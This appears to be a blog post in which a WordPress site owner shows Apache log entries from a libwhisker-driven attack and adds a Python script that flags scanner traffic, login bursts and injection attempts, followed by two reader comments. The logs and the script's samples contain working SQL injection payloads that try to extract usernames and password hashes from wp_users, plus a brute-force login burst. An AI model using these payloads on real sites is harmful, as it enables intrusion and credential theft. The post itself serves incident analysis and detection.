An attack with libwhisker

This site was attacked from a Latvian server. Nothing serious, but it is the second time this month.

You can take a look at the Apache logs below.

94.247.3.38 - - [13/Jan/2009:14:09:56 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:57 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:11 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:13 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:15 +0100] "GET /index.php?feed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:17 +0100] "GET /index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:24 +0100] "GET /index.php?exact=1&sentence=1&s=%a3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(0x3a,user_login,0x3a,user_pass,0x3a)%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:26 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:27 +0100] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(0x3a,user_login,0x3a,user_pass,0x3a)+FROM+wp_users-- HTTP/1.1" 404 16231 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:28 +0100] "GET /wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4+from+wp_users--&display=plain HTTP/1.1" 404 16247 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:29 +0100] "GET /wp-content/plugins/wp-download/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from/**/wp_users/* HTTP/1.1" 404 16259 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:30 +0100] "GET /index.php?page_id=13&album=lala&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201 HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:31 +0100] "GET /forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16185 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:32 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16173 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:33 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x3a,user_login,0x3a,user_pass,0x3a),0,0,0,0,0/**/FROM/**/wp_users/* HTTP/1.1" 404 16197 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:34 +0100] "GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users HTTP/1.1" 404 16263 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:35 +0100] "GET /wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x3a,user_login,0x3a,user_pass,0x3a),concat(0x3a,user_login,0x3a,user_pass,0x3a),4,5/**/FROM/**/wp_users HTTP/1.1" 404 16285 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:36 +0100] "GET /wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null,null,null,null%20%20from%20wp_users HTTP/1.1" 404 16357 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:40 +0100] "GET /wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x3a,user_login,0x3a,user_pass,0x3a)%20from%20wp_users HTTP/1.1" 404 16211 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:41 +0100] "GET /wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6,7%20from%20wp_users-- HTTP/1.1" 404 16241 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:42 +0100] "GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6%20from%20wp_users-- HTTP/1.1" 404 16251 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:43 +0100] "GET /index.php?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null+from+wp_tbv_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:44 +0100] "GET / HTTP/1.1" 200 16299 "-" "Mozilla (libwhisker/2.4)"

These requests were made with libwhisker. They targeted the login page, without success, or WordPress plugins that I have not installed. They also attempted SQL injections into the database, with no more success.
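The three patterns visible in this log (the libwhisker User-Agent, the rapid POSTs to /wp-login.php, and the UNION SELECT probes hidden behind `/**/`, `+` and percent-encoding) can be flagged automatically. The script below is an added example, not code from this site: the function names, the burst threshold and the sample lines (built on the documentation addresses 192.0.2.10 and 198.51.100.7) are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SQLI_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)
BURST = 5  # assumed threshold: login POSTs per IP within one minute

def normalize(uri):
    """Undo the obfuscation seen in the log: percent-encoding, '+', and /**/ used as spaces."""
    for _ in range(2):                      # second pass handles double encoding (%2527)
        uri = unquote(uri)
    return re.sub(r'/\*.*?\*/', ' ', uri.replace('+', ' '))

def analyze(lines):
    report = {"scanner_ips": set(), "sqli": [], "login_bursts": []}
    logins = Counter()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                        # not a combined-format line
        ip, uri = m["ip"], m["uri"]
        if "libwhisker" in m["ua"].lower():
            report["scanner_ips"].add(ip)
        if SQLI_RE.search(normalize(uri)):
            # 404 = target script absent; 200/301 deserve a closer look at the response
            report["sqli"].append((ip, uri.split("?")[0], int(m["status"])))
        if m["method"] == "POST" and uri.startswith("/wp-login.php"):
            logins[(ip, m["ts"][:17])] += 1  # bucket by dd/Mon/yyyy:HH:MM
    report["login_bursts"] = sorted(k for k, n in logins.items() if n >= BURST)
    return report

# Constructed sample, modelled on the entries above; 192.0.2.10 is a documentation address.
UA = '"-" "Mozilla (libwhisker/2.4)"'
SAMPLE = [f'192.0.2.10 - - [13/Jan/2009:14:09:{s:02d} +0100] "POST /wp-login.php HTTP/1.1" 200 2920 {UA}'
          for s in range(50, 56)] + [
    f'192.0.2.10 - - [13/Jan/2009:14:10:15 +0100] "GET /index.php?feed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/* HTTP/1.1" 301 - {UA}',
    f'192.0.2.10 - - [13/Jan/2009:14:10:27 +0100] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(0x3a,user_login,0x3a,user_pass,0x3a)+FROM+wp_users-- HTTP/1.1" 404 16231 {UA}',
    f'192.0.2.10 - - [13/Jan/2009:14:10:30 +0100] "GET /index.php?page_id=13&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from%2F%2A%2A%2Fwp_users HTTP/1.1" 301 - {UA}',
    '198.51.100.7 - - [13/Jan/2009:14:11:02 +0100] "GET /index.php?s=trade+union HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The User-Agent rule is the weakest of the three signals, since a client can send any string it likes; the normalised UNION SELECT match and the login burst count do not depend on it.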

2 thoughts on "An attack with libwhisker"

  1. Hi Xavier,

    I don’t ban IP addresses on my server because I never know who is using it.

    I found this site which is talking about security.

    Regards,

    Laurent

  2. Hi
    I get trouble with 94.247.3.38.
    I try many times to hack my web site with SQL injection.
    I think I didn’t manage to crack my password, but they try.
    Do you know how to ban this IP from my visitor?
    Do you know which plugin is weak or poor for security?

    Thanks for your help.
    Please contact me by email.

    xavier
